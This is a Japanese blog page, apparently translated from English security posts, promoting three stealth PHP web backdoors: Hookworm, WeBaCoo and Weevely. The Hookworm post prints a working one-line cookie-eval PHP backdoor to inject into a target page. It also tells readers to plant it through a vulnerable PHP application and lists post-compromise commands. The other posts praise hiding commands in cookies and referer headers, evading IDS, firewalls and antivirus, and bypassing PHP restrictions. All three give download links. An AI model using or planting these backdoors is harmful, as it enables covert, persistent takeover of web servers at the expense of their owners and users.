ラベル Backdoor tool の投稿を表示しています。 すべての投稿を表示
ラベル Backdoor tool の投稿を表示しています。 すべての投稿を表示

2012年2月15日水曜日

Hookworm:ステルスPHPバックドア!

(元記事はこちら)

Weevelyだとか 、最近ではWeBaCoo に関する記事を覚えているのなら、私たちが何の話をするのかおわかりだろう。そう - ステルス、クッキーベース、Webバックドアだ。今回はフックワームについてだ。

 リモートシェルスクリプトバックドアを使用する状況といえば、リモートサーバ上にコマンドを発行しやすくしたい時だ。その機能は様々で、プログラミング言語も様々、サイズも様々だ。URLの引数を評価するシンプルなスクリプトもあり、関数を使ってそれらを実行し、結果をWebページに表示し、ポイント・アンド・クリックによる操作を備えた複雑なユーザーインターフェイスで、陥落後の多くアクティビティをこなしてくれる。URLの引数を評価するスクリプトの問題点は、どんなシェルが使用されたのかという証拠を多量のログファイルとして残してしまうことだ。第二に、それらのほとんどは、アップロードされたサーバ上のコマンドサポートにおける、静的な性質に依存して構築されている。HTTP GETおよびPOST変数は簡単に観測でき、検出や監査証跡の形成をしやすくしてしまうだろう。

 こういった不安要素すべてを念頭において、 Hookworm製作者 - Mr.ジャスティンクラインキーンは、より巧妙なバックドアの構築にとりかかった。彼は、悪意のあるペイロードを運ぶために使用できる、クライアントとサーバー間で渡される数多くの見落とされがちなHTTP変数が存在することに気付いた。Hookwormは、単にブラウザによって送信されたクッキーを探して、クッキーのペイロードの制約にもかかわらず、大規模なデータを送信するために、クッキー、任意の数の間の応答を分割することによって応答します。クッキーが持つのは限られたデータを運ぶ能力で、容量には制限がある(4096バイト)。しかし、RFC 2109によれば、サイトがクライアントに設定できるCookieの数の制限は、非常に高くなっている。これはクライアントが制御するものなので、数字は、あなたの望むままにできてしまう!

では、どのように実際に鉤虫を実行するのだろう?あなたがする必要があるのは、ターゲットシステム上のファイルを編集できるような、PHPアプリケーションの脆弱性を見つけることだ。SQLインジェクション脆弱性の発見なら、私に任せて。ファイルのアップロード、あるいはリモートファイルインクルージョンが動作するものだろうと、見つけることは難しくない。


<?php if(isset($_COOKIE['c'])) {eval($_COOKIE['c']); echo $_COOKIE['d'] . $r . $_COOKIE['d'];}?>
 
を対象となるWebページへ追加すればいい。ここで、'c'cookieがペイロードコマンドを運ぶのに対して、'd'のcookieは区切り文字を保持し、クライアントが余分なHTMLを取り除いて表示できるようになっている。このコードが、ホストのPHPページに注入されると、Hookwormのデータは応答の中にカプセル化され、Hookwormクライアントによって簡単に解釈できるようになる。次のコマンドラインで鉤虫PHPクライアントを実行する:
 
 $ php hookworm.php
 
スクリプトの相対パスによる、接続用IPを入力するよう求められる。スクリプトの場所を指示すれば出来上がりだ!シェルは君のものだ!

フックワームが備えているコマンド:

  1. shell_exec()とを介してコマンドをフォークする
  2. PHPのコマンドを発行する
  3. すべての。htaccessファイルを見つける
  4. すべての。htaccessファイルを見つける
  5. すべてのSUIDファイルを見つける
  6. ファイル名の[名前]を持つすべてのファイルを見つける
  7. すべての書き込み可能なファイルとフォルダを見つける
  8. マシン上で開いているポートを表示する
フックワームによる利点は、アップロードするファイルサイズの制限をあまり心配する必要がないことだ。セキュアな、HTTPSチャネルで接続すると、長い時間にわたるコントロールを設定できます。一旦"インストール"されてしまえば、システム上のhookwormを検出することは、ファイル変更の監視やHTTP / HTTPSリクエストを介して入ってくるクッキー検査を除けば、非常に困難になる、。
このツールは、概念の実証としてのみ開発されたものであり、悪意のある目的を意図したものではないことを念頭におく必要がある。

Download Hookworm:

Hookworm v1.0  hookworm.php/hookworm.php.tar.gz  http://www.madirish.net/sites/default/files/hookworm.php.tar.gz

2012年1月31日火曜日

[英⇒日]WeBaCoo:ウェブ バックドア クッキー!



WeBaCooは小さなステルスPHPバックドアです 。我々は、その作者であるMr.Anestis BechtsoudisによるSubmit Your Tool option経由で、このツールを知りました。類似の記事にはweevely のものがあります。

WeBaCooは、Web Backdoor Cookieの略で、データ転送にHTTPCookie Headerを使用します。リモート"端末"接続をシミュレートするために、 backdoorのついたサーバをつかいます。言い換えれば、WeBaCooはシェルコマンドを、HTTPのヘッダフィールドに隠して送信し、サーバの出 力には、HTMLコードの一部としてしか出力されません。執行するにはPHPの知識をいくらか持っている必要がありますが、ありがたいことにいくつかの R&Dが助けてくれるでしょう。

WeBaCoo の裏側にある一般概念は非常にシンプルです。第一に、バックドアのPHPコードは、主要なPHPのシステム関数を含むペイロードを使用して生成され、基本的なCookie処理メカニズムのもとで動作します。その後このコードは注入され、完了するとクライアントはシェルコマンドを送ることができます。 Cookieヘッダに隠され、Base64エンコーディングで難読化されます。サーバー側ではシェルコマンドが実行され、出力はCookieヘッダで隠さ れて(ba​​se64でのエンコードも同様)、クライアントに送信されます。この種のコンセプトの利点は、通信データのステルス性がかなり高く、標準的 な構成のアプリケーションファイアウォールやIDS / IPSに引っかかることがないので、クリーニングするログの数が少なくて済むことです!


事前定義されたペイロードを使用してPHPバックドアのコード作成を行う、生成モードを備えています。また、"ターミナル"モードも備えています。ユーザーがサーバーとのリモート"端末"接続を確立し、稼働中のWebサービスのお望みのコマンドをユーザー権限 で実行できるものです。

GPLv3 ライセンスの下で、Perlで書かれ、そしてGithubでホストされています。最近はPerlを実行できるシステムを見つけることは難しくないはずです! 著者はまた何か計画しているとのことで、将来のリリースが楽しみです。なので、TOR/ Proxyのサポートや、クッキーの名前の動的な変更といった機能も、もう間もなくです!

 

Download WeBaCoo

WeBaCoo v0.1.1anestisb-WeBaCoo.ziphttp://github.com/anestisb/WeBaCoo/zipball/master

2012年1月30日月曜日

[英⇒日]weevely:ステルス小型PHPバックドア!

 (元記事はこちら)

Weevelyをつかうと、ほとんど検出できないように設計されたPHPトロイを、作成および管理できます。このソフトウェアは、目立ちにくいPHPバックドアの概念実証であり、telnetライクな接続、HTTPリファラーの隠しデータ、システムライクな機能の動的なプローブの使用を完全にシミュレートし、PHPのセキュリティ上の封鎖をすり抜けます。PHPコードを生成してWebサーバをトロイ化させ、telnetクライアントのように振る舞わせてコマンドを実行させたり、backdoor化されたサーバー上に付加的な機能を注入したりします。 weevelyはblachbox Linuxのにも収録されており、詳細な説明はこちら 
weevelyの特徴 
  • Coded requests:バックドアサーバとクライアント間の通信は、通常のHTTPリクエストを介して行われ、コード化されたコマンドが織り込まれたもっともらしい偽のHTTP_REFERERヘッダフィールドをつかって、NIDSのモニタリングとHTTPログファイルのレビューからトラフィックを隠蔽します。
  • PHP security bypass :このプログラムで迂回を試みているものは、PHPの設定のうち、賢い外部プログラム実行機能を無効化させてしまうものです。このオプション有効にすると、php.iniに記述された機能を無効にします。Weevelyはさまざまなシステム関数を試して((system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval())リモートサーバ上で有効化されている機能を見つけ利用します。
  • 小型サーバ :バックドアサーバのコードは小さく、他のPHPファイルに簡単に紛れ込ませることができます。コアは動的に暗号化され、パターンマッチングコントロールをバイパスすることを狙っています。
  • モジュール性:バックドアサーバの機能をインクリメントするのはモジュールをつかえば簡単になります。バックドアを介してPHPのコードを注入して、リモートサーバ上に新しい機能を実装します。新しいモジュールのコー​​ドとロードは、本当に簡単です。現在の追加モジュールは次のとおり :安全なモードの確認、ファイルの読み取り、リモートサーバ上のファイルのダウンロード、書き込み可能なパス検索。
  • 確かに、インストールしておくと、サーバがコントロール下にあり、リモートで制御したい場合にはよさそうです。オープンソースなので、アンチウイルスによって検出されるようになった場合には変更を加えることができます。

    Download Weevely v0.3 (weevely-0.3.tar.gz) here.